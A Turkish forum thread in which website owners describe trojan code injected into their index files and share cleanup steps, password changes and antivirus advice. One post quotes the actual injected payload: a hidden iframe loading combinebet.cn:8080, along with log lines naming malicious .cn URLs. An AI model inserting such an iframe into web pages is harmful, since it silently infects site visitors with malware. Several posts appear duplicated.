|
|
Sitesine Trojan bulasanlarin dikkatine - StopBadware
- Konbuyu başlatan Loi
- Başlangıç tarihi
ben şöyle temizledim. arkadaşlar
bit defender kurdum sonrasında update ettim ve sitelerin bulunduğu dizini taradım
bdc --files /var/www/vhosts > sonuc.txt
sonrasında virus bulaşmış dosyaları buluyor.
elde edilen dosyada virüs bulaşmış dosya satırları var
bunu da
perl -p -i -e "s/silineceksatır/ /g" dosya_yolu şeklinde direk silio
ben böle yaptım.... tabi bunu bulunan tüm satırlar için not defterinde tek tek düzenledim sonra kopyalayıp ssh da yapıştır dedim şakır şakır temizlendi...
bit defender kurdum sonrasında update ettim ve sitelerin bulunduğu dizini taradım
bdc --files /var/www/vhosts > sonuc.txt
sonrasında virus bulaşmış dosyaları buluyor.
elde edilen dosyada virüs bulaşmış dosya satırları var
bunu da
perl -p -i -e "s/silineceksatır/ /g" dosya_yolu şeklinde direk silio
ben böle yaptım.... tabi bunu bulunan tüm satırlar için not defterinde tek tek düzenledim sonra kopyalayıp ssh da yapıştır dedim şakır şakır temizlendi...
K
KaaN_
Misafir
teşekkürler çok faydalı oldu
wordpress kullanananlar, konuları copy/paste yaparken dikkat etsinler. Kardeşim sitenin birinden bir konuyu kopyalayıp yayınla demiş. Kopyaladıgı yerde iframeli trojan/virüs herneyse googlenin yasaklı site durumuna getirmiş sitesini. Mail attık bekliyoruz şimdi ne zaman kaldıracak uyarısını
ayni sekilde benimde serverdeki yaklasik 12 sitenin icindeki index dosyalarina java ve php kodlari eklenmisti, sirf ana index sayfalari degil alt klasörlerdeki index dosyalarida ayni sekildeydi, hepsini tek tek sildim yaklasik 6 saatimi aldi tamamen temizlemek.
Sonuc olarak ankadikmi root olarak girilmemis servere bir trojan yardimiyla Cute Ftp nin database dosyasini ele geciriyorlar ve otomatik olarak script atiyorlar indexlere.
Sebebide CUte Ftp nin icindeki bir trojan (crackli kullandigim icin benim hiyarligim).
Ilk olarak makineye format attim ve FTp serveri durdurduktan sonra bütün ftp sifrelerini degistirdim simdilik durum iyi, Cute ftp yi marezden aldiysaniz silin makinenizi trojanlardan temizleyin ve ftp sifrelerinizi degitirin.
Sonuc olarak ankadikmi root olarak girilmemis servere bir trojan yardimiyla Cute Ftp nin database dosyasini ele geciriyorlar ve otomatik olarak script atiyorlar indexlere.
Sebebide CUte Ftp nin icindeki bir trojan (crackli kullandigim icin benim hiyarligim).
Ilk olarak makineye format attim ve FTp serveri durdurduktan sonra bütün ftp sifrelerini degistirdim simdilik durum iyi, Cute ftp yi marezden aldiysaniz silin makinenizi trojanlardan temizleyin ve ftp sifrelerinizi degitirin.
aynı sorun bende de var. bilgisayarım sürekli kitleniyordu. en sonunda formatlamak zorunda kaldım. pc yi temizledikten sonra web sitelerime girince virrus uyarıları almaya başladım.
web sitelerimde her dosyanın içine yukarıdaki kodlar bulaşmış. bu kodlar sadece kaynagı göster dediğimde çıkıyor. pc ye indirdigimde kod kalmıyor.
web sitelerimde her dosyanın içine yukarıdaki kodlar bulaşmış. bu kodlar sadece kaynagı göster dediğimde çıkıyor. pc ye indirdigimde kod kalmıyor.
- Katılım
- 10 Mart 2008
- Mesajlar
- 210
- Reaction score
- 2
bu kodlar gizli down java kodlarıdır kısaca .exe uzantılı downloader kodlarını google görmesin diye javalıyıp sitenize yerleştirmişlerdir ve hitinizi kullanarak sitenize girenlere trojan bulaştırılıyor bu sayede
sitenizin açıklarını kontrol edin yada ettirebilirsiniz genelde açıktan yararlanıp koyarlar bu kodları
yada serverınızda backdoor ( açık kapı ) olabilir server size aitse güvenlik önlemleri alıp bu kodların eklenmemesini sağlıyabilirsiniz
Malesef ki şu anda özellikle trojanları yakalamak çok zor. Normal bir trojan uygulamasını bir antivirüs yakalarken, "packleme" olarak adlandırılan programdan, virusler geçirildikten sonra hiçbir antivirüs yakalayamıyor. Belli bir süre sonra, packten geçirilen virüsleri antivirüsler görmeye başlıyor fakat çoktan yeni ve yakalanmayan bir "packer" çıkmış oluyor. Yapılacak en mantıklı şey dikkatli olmak ve firewall kullanıp bilgisayardan internete erişmek isteyen tüm uygulamalara tek tek izin vermek/vermemek.
06.06.2009 04:22:38 http://bestlitediscover.cn:8080/landig.php?id=4 Adobe Reader 8.1 Reddedildi: bestlitediscover.cn/landig.php* Veritabanları
06.06.2009 04:22:15 http://hugetoplocate.cn:8080/cache/readme.pdf Internet Explorer İşleme Hatası: HEUR:Exploit.Script.Generic
benimde bir kaç siteye index dosyalarına iframe kodu yazmış bu trojan linkleride bunlar.
<iframe src="http://combinebet.cn:8080/index.php" width=139 height=122 style="visibility: hidden"></iframe>
06.06.2009 04:22:15 http://hugetoplocate.cn:8080/cache/readme.pdf Internet Explorer İşleme Hatası: HEUR:Exploit.Script.Generic
benimde bir kaç siteye index dosyalarına iframe kodu yazmış bu trojan linkleride bunlar.
<iframe src="http://combinebet.cn:8080/index.php" width=139 height=122 style="visibility: hidden"></iframe>
Örnek bir kod varmı?
Aynısı başıma gelmişti. index.php yi daha önceki aldığım yedek index.php ile değiştirerek sorunu süzelttim. Bu sorunu tam olarak düzelttiğim anlamına gelmez, ek olarak yapılması gereken ftp giriş bilgilerinin değiştirilmesi. O da kolay fakat böyle bi sorunu tekrar yaşamamak için ne gibi güvenlik önlemi alabiliriz ?
Kaspersky bu tür virüsleri diğerlerine nazaran çok daha hızlı tanıyor ve engelliyor.
Satın alıcam hangisini aliyim ?
Kaspersky Internet Security 2009
Kaspersky Anti-Virus 2009
Kaspersky Mobile Security
Mobile security zaten cep telefonları pda vs. için
internet security' de dahili firewall, antispam vs. bulunuyor antivirus sadece antivirüs programı bulunuyor, firewall mutlaka bulunmalı bilgisayarınızda önemli bilgiler yer alıyorsa ama standart bir pc kullanıcısıysanız antivirus yeter